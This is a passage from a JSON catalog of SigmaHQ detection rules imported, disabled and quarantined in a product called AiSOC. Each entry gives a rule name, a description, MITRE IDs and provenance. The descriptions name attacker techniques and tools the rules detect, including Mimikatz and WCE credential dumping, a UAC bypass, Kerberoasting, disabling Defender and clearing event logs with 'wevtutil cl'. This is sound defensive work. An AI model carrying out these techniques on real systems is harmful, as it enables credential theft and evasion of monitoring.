"rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml" } }, { "id": "sigmahq-sigma-a62b37e0-45d3-48d9-a517-90c1a1b0186b", "type": "detection", "name": "Eventlog Cleared", "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml" } }, { "id": "sigmahq-sigma-a6355fbe-f36f-45d8-8efc-ab42465cbc52", "type": "detection", "name": "Delegated Permissions Granted For All Users", "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delegated-permissions-granted-for-all-users.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml" } }, { "id": "sigmahq-sigma-a642964e-bead-4bed-8910-1bb4d63e3b4d", "type": "detection", "name": "HackTool - Mimikatz Execution", "description": "Detection well-known mimikatz command line arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005", "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-mimikatz-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml" } }, { "id": "sigmahq-sigma-a66bc059-c370-472c-a0d7-f8fd1bf9d583", "type": "detection", "name": "Network Connection Initiated By Eqnedt32.EXE", "description": "Detects network connections from the Equation Editor process \"eqnedt32.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-eqnedt32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_eqnedt.yml" } }, { "id": "sigmahq-sigma-a6976974-ea6f-4e97-818e-ea08625c52cb", "type": "detection", "name": "Potential RipZip Attack on Startup Folder", "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ripzip-attack-on-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ripzip_attack.yml" } }, { "id": "sigmahq-sigma-a699b30e-d010-46c8-bbd1-ee2e26765fe9", "type": "detection", "name": "Powershell Store File In Alternate Data Stream", "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-store-file-in-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" } }, { "id": "sigmahq-sigma-a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "type": "detection", "name": "Potentially Suspicious Powershell Script Execution From Temp Folder", "description": "Detects a potentially suspicious powershell script executions from temporary folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-powershell-script-execution-from-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_script_exec_from_temp_folder.yml" } }, { "id": "sigmahq-sigma-a6b33c02-8305-488f-8585-03cb2a7763f2", "type": "detection", "name": 
"Windows Credential Editor Registry", "description": "Detects the use of Windows Credential Editor (WCE)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-editor-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" } }, { "id": "sigmahq-sigma-a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "type": "detection", "name": "RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses", "description": "Detects calls to the AtomicTestHarnesses \"Invoke-ATHRemoteFXvGPUDisablementCommand\" which is designed to abuse the \"RemoteFXvGPUDisablement.exe\" binary to run custom PowerShell code via module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remotefxvgpudisablement-abuse-via-atomictestharnesses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-a70dcb37-3bee-453a-99df-d0c683151be6", "type": "detection", "name": "Firewall Rule Update Via Netsh.EXE", "description": "Detects execution of netsh with the \"advfirewall\" and the \"set\" option in order to set new values for properties of a existing rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-rule-update-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a70dcb37-3bee-453a-99df-d0c683151be6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml" } }, { "id": "sigmahq-sigma-a717c561-d117-437e-b2d9-0118a7035d01", "type": "detection", "name": "OneLogin User Account Locked", "description": "Detects when an user account is locked or suspended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onelogin-user-account-locked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"a717c561-d117-437e-b2d9-0118a7035d01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/onelogin/onelogin_user_account_locked.yml" } }, { "id": "sigmahq-sigma-a743ceba-c771-4d75-97eb-8a90f7f4844c", "type": "detection", "name": "UAC Bypass Using PkgMgr and DISM", "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-pkgmgr-and-dism.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" } }, { "id": "sigmahq-sigma-a746c9b8-a2fb-4ee5-a428-92bee9e99060", "type": "detection", "name": "SQL Client Tools PowerShell Session Detection", "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1127" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sql-client-tools-powershell-session-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml" } }, { "id": "sigmahq-sigma-a753a6af-3126-426d-8bd0-26ebbcb92254", "type": "detection", "name": "Osacompile Execution By Potentially Suspicious Applet/Osascript", "description": "Detects potential suspicious applet or osascript executing \"osacompile\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/osacompile-execution-by-potentially-suspicious-applet-osascript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a753a6af-3126-426d-8bd0-26ebbcb92254", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml" } }, { "id": "sigmahq-sigma-a7664b14-75fb-4a50-a223-cb9bc0afbacf", "type": "detection", "name": "HackTool - RemoteKrbRelay Execution", "description": "Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-remotekrbrelay-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7664b14-75fb-4a50-a223-cb9bc0afbacf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay_remote.yml" } }, { "id": "sigmahq-sigma-a77c1610-fc73-4019-8e29-0f51efc04a51", "type": "detection", "name": "Potential Dosfuscation Activity", "description": "Detects possible payload obfuscation via the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dosfuscation-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" } }, { "id": "sigmahq-sigma-a7af2487-9c2f-42e4-9bb9-ff961f0561d5", "type": "detection", "name": "Audio Capture", "description": "Detects attempts to record audio using the arecord and 
ecasound utilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audio-capture.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_audio_capture.yml" } }, { "id": "sigmahq-sigma-a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", "type": "detection", "name": "Juniper BGP Missing MD5", "description": "Detects Juniper BGP events reporting a missing MD5 digest, which may be indicative of brute-force attacks to manipulate routing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/juniper-bgp-missing-md5.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/juniper/bgp/juniper_bgp_missing_md5.yml" } }, { "id": "sigmahq-sigma-a7c3d773-caef-227e-a7e7-c2f13c622329", "type": "detection", "name": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", "description": 
"Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bad-opsec-defaults-sacrificial-processes-with-improper-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7c3d773-caef-227e-a7e7-c2f13c622329", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" } }, { "id": "sigmahq-sigma-a7df0e9e-91a5-459a-a003-4cde67c2ff5d", "type": "detection", "name": "Potentially Suspicious Command Executed Via Run Dialog Box - Registry", "description": "Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\nThis technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-command-executed-via-run-dialog-box-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7df0e9e-91a5-459a-a003-4cde67c2ff5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml" } }, { "id": "sigmahq-sigma-a7ee1722-c3c5-aeff-3212-c777e4733217", "type": "detection", "name": "Disable Windows Defender AV Security Monitoring", "description": "Detects attackers attempting to disable Windows Defender using Powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-defender-av-security-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7ee1722-c3c5-aeff-3212-c777e4733217", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" } }, { "id": "sigmahq-sigma-a80d927d-ac6e-443f-a867-e8d6e3897318", "type": "detection", "name": "Creation Of Pod In System Namespace", "description": "Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.\nSystem pods, created by controllers such as Deployments 
or DaemonSets have random suffixes in their names.\nAttackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.\nDeployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-pod-in-system-namespace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a80d927d-ac6e-443f-a867-e8d6e3897318", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml" } }, { "id": "sigmahq-sigma-a80f662f-022f-4429-9b8c-b1a41aaa6688", "type": "detection", "name": "Internet Explorer Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/internet-explorer-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" } }, { "id": "sigmahq-sigma-a8322756-015c-42e7-afb1-436e85ed3ff5", "type": "detection", "name": "DNS TOR Proxies", "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-tor-proxies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a8322756-015c-42e7-afb1-436e85ed3ff5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_torproxy.yml" } }, { "id": "sigmahq-sigma-a840e606-7c8c-4684-9bc1-eb6b6155127f", "type": "detection", "name": "PUA - AWS TruffleHog Execution", "description": "Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.\nIt has been reported to be used by threat actors for credential harvesting. 
All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-aws-trufflehog-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a840e606-7c8c-4684-9bc1-eb6b6155127f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_pua_trufflehog.yml" } }, { "id": "sigmahq-sigma-a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", "type": "detection", "name": "Primary Refresh Token Access Attempt", "description": "Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/primary-refresh-token-access-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml" } }, { "id": "sigmahq-sigma-a85f7765-698a-4088-afa0-ecfbf8d01fa4", "type": "detection", "name": "Potential Memory Dumping Activity Via LiveKD", "description": "Detects execution of LiveKD based on PE metadata or image name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-memory-dumping-activity-via-livekd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a85f7765-698a-4088-afa0-ecfbf8d01fa4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml" } }, { "id": "sigmahq-sigma-a85ffc3a-e8fd-4040-93bf-78aff284d801", "type": "detection", "name": "Use Of The SFTP.EXE Binary As A LOLBIN", "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-the-sftp-exe-binary-as-a-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" } }, { "id": "sigmahq-sigma-a861d835-af37-4930-bcd6-5b178bfb54df", "type": "detection", "name": "Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock", "description": "Detects PowerShell scripts that utilize native PowerShell Identity modules to request Kerberos tickets.\nThis behavior is typically seen during a Kerberoasting or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kerberos-ticket-request-via-powershell-script-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a861d835-af37-4930-bcd6-5b178bfb54df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" } }, { "id": "sigmahq-sigma-a8f29a7b-b137-4446-80a0-b804272f3da2", "type": "detection", "name": "Persistence and Execution at Scale via GPO Scheduled Task", "description": "Detects lateral movement using a GPO scheduled task, a technique usually used to deploy ransomware at scale", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
